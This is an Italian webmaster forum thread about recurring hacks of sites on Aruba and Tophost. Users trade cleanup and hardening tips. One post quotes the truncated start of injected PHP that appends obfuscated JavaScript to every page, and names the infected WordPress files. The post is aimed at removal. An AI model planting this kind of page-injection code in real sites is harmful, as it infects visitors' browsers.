• User Newbie

    Ciao Redemption,
    anche io è da anni che uso sia aruba che tophost e onestamente mi sto stancando di queste continue intrusioni... ne ho avuta una a novembre mentre ero in viaggio di nozze (non vi immaginate le best****e che giravano alle Hawaii) e un'intrusione ora.

    Mi raccomando, un consiglio: se sulla vostra login sono abbinati più domini controllateli tutti, controllate i files index e la possibile presenza del file mailcheck

    tophost è valido ma sotto certi aspetti ti limita molto nel caso si abbia un sito di discreto spessore


  • User Attivo

    @yabeforg: se sei sotto i 1000 utenti gg o 2000pg/gg si altrimenti no.

    @reloaded: menomale che me lo ha segnalato un mio utente perché è successo alle 14:30 e ho risolto alle 20 quando google aveva già sgamato la cosa bloccandone alcune.

    Si, controllare tutti i domini e cambiare immediatamente password di accesso, perché clonano i dati di accesso di tutti gli account.


  • Consiglio Direttivo

    Ciao ragazzi,

    lo script da rimuovere è il seguente:

    <?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">var $a="Z63cZ3dZ225nZ2567Z2574h; ect, ect ect 😉

    presente "come segnalato anche da Redemption" nelle:

    .index.html
    .index.php

    Per gli utenti wordpress: verificare anche i seguenti file in wp-includes

    • default-embeds.php
    • default-widgets.php
    • default-filters.php

    nella root:

    • wp-config.php
    • index.php
    • mailcheck.php --> da rimuovere

    nella cartella cgi-bin;

    :ciauz:

    @Redemption said:

    Aruba risponderà come al solito che è colpa dei cms scommettiamo?

    ... :giggle:


  • User

    Io riguardo l'affidabilità di tophost stò avendo dei dubbi da qualche mese a questa parte, ultimamente basta fare qualche ricerca su google per trovare commenti negativi o comunque non idilliaci sulle prestazioni e sicurezza dei loro server da parte dei loro clienti...riguardo Aruba che è uno dei più grossi in Italia, mi sembra realmente assurda questa notizia :S. Proprio ieri in cerca di un sito di web hosting adatto alle mie esigenze ho trovato see4u mi sembra che abbiano un buon rapporto qualità/prezzo. Qualcuno ne è cliente?


  • User

    Io credo che vada fatto un attimo di chiarezza: bisogna capire un secondo che versione del CMS è installata (ricordo che vecchie versioni di wordpress hanno pesanti falle, idem per Joomla!) e quali plugins installati.

    Spesso e volentieri il bug arriva proprio da lì. Per darvi un'idea: nel giro di due settimane gli sviluppatori di joomla han fatto uscire tre versioni diverse (sono passati dalla 1.5.18 alla 1.5.20 passando per la 1.5.19).

    Poi è noto che le versioni sw che hanno sui servers non sono molto aggiornate (alcuni srv hanno versione 5.2.9 di php), ma spesso e volentieri vengono sfruttate prima le falle del sito e non del demone.

    E' anche molto più semplice per l'hacker/cracker ed è pure il primo spiraglio che si cerca prima di "bombare" l'intera macchina.

    Poi bisgona valutare anche altri fattori ma non sono argomenti del topic... 😉


  • User Attivo

    Per esperienza vi posso garantire che questi problemi sono dovuti ai seguenti problemi:

    1)Permessi sbagliati sui file e directory specialmente sulla root
    2)CMS non aggiornati
    3)password di ftp molto semplici

    Con le corrette permission e con i restanti due punti messi in sicurezza nessuno vi buchera' nulla 🙂 a meno che non ci sia un bug nello script


  • User Attivo

    Sempre ultime versioni dei cms, password di almeno 8-10 caratteri con maiuscole e numeri permessi sempre 755.

    Anche questa volta Aruba ha fatto intendere che il problema era dal lato client con improbabili trojan che catturano gli username e le pwd degli ftp e poi si collegano tutti allo stesso momento... ora mi chiedo, chissà perché di tutti gli hosting che possiedo e di tutti i domini che ho mi succede sempre e solo su aruba.


  • User

    @Redemption said:


    Concordo con quello che ha detto Daniele, riguardo invece le versioni: ripeto, potrebbe trattarsi di un bug non conosciuto presente sul CMS in uso.

    Poi entrano in gioco anche altri fattori (vedi quello che avevo scritto qualche post fa: le versioni dei demoni presenti sul server e la loro configurazione contano molto) ma il primo passo è quello di tenere sicuro e aggiornato il sito.

    La "scusa" dei trojan ci può anche stare: putroppo è un episodio molto comune e quindi magari la usano come risposta predefinita... 🙂


  • User

    Anche a me capita spesso con dominio aruba di trovare al posto della mia home l'avviso di sito malevolo...


  • User Attivo

    Ragazzi mi hanno hackerato un sito che ho su aruba..sono disperatissimo...era presente in gn anche...lo avevo pagato anche molto...non so che fare...non riesco ad entrare in ftp e nulla...mi hanno messo nell home sito in manutenzione ed amen...aiutatemi vi prego!!!


  • User Attivo

    misà che mi hanno cancellato tutto...ma proprio tutto...lo hanno portuto fare?


  • User Attivo

    Non so che succede, nel mio sito di punta dice sito in manutenzione, ma tutti i domini sono andati, non riesco a capire che cosa sia successo.


  • User Attivo

    sucede anche ad altri...dicono sia aruba in manutenzione straordinaria....tutti i link post del mio sito, tranne la home dove dice "Sito in manutenzione" sono spariti...


  • User Attivo

    I server SQL funzionano, la macchina server dove il sito viene hostato risponde al ping, che sia una manutenzione straordinaria?